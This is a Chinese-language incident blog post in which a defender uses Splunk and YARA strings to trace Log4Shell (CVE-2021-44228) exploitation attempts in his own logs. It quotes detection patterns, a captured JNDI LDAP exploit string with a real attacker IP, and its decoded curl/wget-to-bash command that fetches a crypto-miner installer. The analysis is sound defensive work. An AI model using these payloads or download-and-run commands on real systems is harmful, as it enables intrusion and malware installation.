驱车回家途中,我收到了关于 #log4shell 漏洞的第一波消息。
2021年12月9日,Apache Log4j 2 工具多个版本受到一个严重漏洞(CVE-2021-44228)的影响,该漏洞通过项目的 GitHub 公开发布。此漏洞由阿里巴巴云安全团队的陈兆军发现,影响 Apache Log4j 2 版本 2.0 至 2.14.1。
到家后我立刻投入工作。一如既往地使用 Splunk4tw。
首个概念验证漏洞利用在 GitHub 上发布后,威胁行为者开始扫描互联网,寻找存在此远程可利用安全漏洞(无需认证)的系统。下面你将看到的是其中部分扫描和漏洞利用尝试。
我的第一反应是看看是否有人发布了初始 YARA 规则。 在这里找到了:https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b(感谢 Florian Roth)
它提到了以下检测字符串:
strings:
$x1 = "${jndi:ldap:/"
$x2 = "${jndi:rmi:/"
$x3 = "${jndi:ldaps:/"
$x4 = "${jndi:dns:/"
我不怕……让我们压榨一下 CPU,直接用最糟糕的 Splunk 搜索来个致命一击。
index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")
我在我的 IIS 日志和 Windows 事件日志(已编辑)中都发现了命中记录,防火墙日志中也有大量被拦截的尝试……
IIS:

WINEVENTLOG:

检查 IP 地址 45.155.205.233……圣彼得堡,俄罗斯……真是意料之中。

找到的字符串看起来像一个经典的教科书式混淆编码恶意字符串。 让我们看看它做了什么:
使用 CyberChef 解码 Base64 字符串:
2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash
Curl……运行 shell 脚本,bash……我的天。我开始意识到这个恶心的东西会做什么了……
让我们在沙盒中运行这个 curl 命令:

368 行代码。 (如果你想查看整个脚本,在这里运行:https://reqbin.com/c-ipejxywd)
一些片段:

完成后,它甚至还会清除日志文件……真是意料之中:

它基本上试图安装一种名为 Kingsin 的恶意软件,这是一种加密货币矿机。目标是 nix 系统。 请确保修补你的系统,因为该漏洞利用可能会被用于运行各种载荷。
感谢我的同事 Umbrio 的 Martijn 和 Rob [redacted],在这个周五晚上通过 WhatsApp 激烈讨论。 00:09 该睡觉了。
#更新与优质资源#
